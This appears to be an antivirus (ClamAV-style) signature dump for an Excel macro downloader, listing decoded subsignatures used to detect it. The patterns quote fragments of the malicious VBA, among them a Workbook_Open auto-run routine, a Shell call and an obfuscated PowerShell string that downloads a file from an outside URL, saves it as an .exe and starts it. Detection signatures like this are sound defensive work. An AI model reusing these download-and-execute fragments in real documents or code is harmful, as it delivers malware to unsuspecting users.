VIRUS NAME: Xls.Downloader.Emodldr-6922879-0
TDB: Engine:51-255,Target:2
LOGICAL EXPRESSION: 0&1&2&3&4&5&6&7
 * SUBSIG ID 0
 +-> OFFSET: ANY
 +-> SIGMOD: NONE
 +-> DECODED SUBSIGNATURE:
Function teresdecr()
 * SUBSIG ID 1
 +-> OFFSET: ANY
 +-> SIGMOD: NONE
 +-> DECODED SUBSIGNATURE:
Function wordchamp()
 * SUBSIG ID 2
 +-> OFFSET: ANY
 +-> SIGMOD: NONE
 +-> DECODED SUBSIGNATURE:
If 4 < 2 Then
 * SUBSIG ID 3
 +-> OFFSET: ANY
 +-> SIGMOD: NONE
 +-> DECODED SUBSIGNATURE:
Shell japann, msoAutoSizeNone + 0
 * SUBSIG ID 4
 +-> OFFSET: ANY
 +-> SIGMOD: NONE
 +-> DECODED SUBSIGNATURE:
Sub Workbook_Open()
 * SUBSIG ID 5
 +-> OFFSET: ANY
 +-> SIGMOD: NONE
 +-> DECODED SUBSIGNATURE:
nasdaqa = "SYst" + airshep + "ebCl" + "ient).""doW" + "Nl`o" + milluol + "Le"".""Inv`OKE""(('h'+'tt'+'p:/'+'/ravi'+'gel.'+'c'+'.om/'+'tv'+'s'+'.'+'dat'),""$omes\\" + vectorcirc + ".exe"")}while(!${?});^^^&(""{0}{3}{2}{1}""-f 'S','ess','roc','tart-P') $omes\" + vectorcirc + ".exe |cLip.ex" + "E&&c" + "mD.EXE"
 * SUBSIG ID 6
 +-> OFFSET: ANY
 +-> SIGMOD: NONE
 +-> DECODED SUBSIGNATURE:
tlenon = goodput
 * SUBSIG ID 7
 +-> OFFSET: ANY
 +-> SIGMOD: NONE
 +-> DECODED SUBSIGNATURE:
zirafus = "  -N"
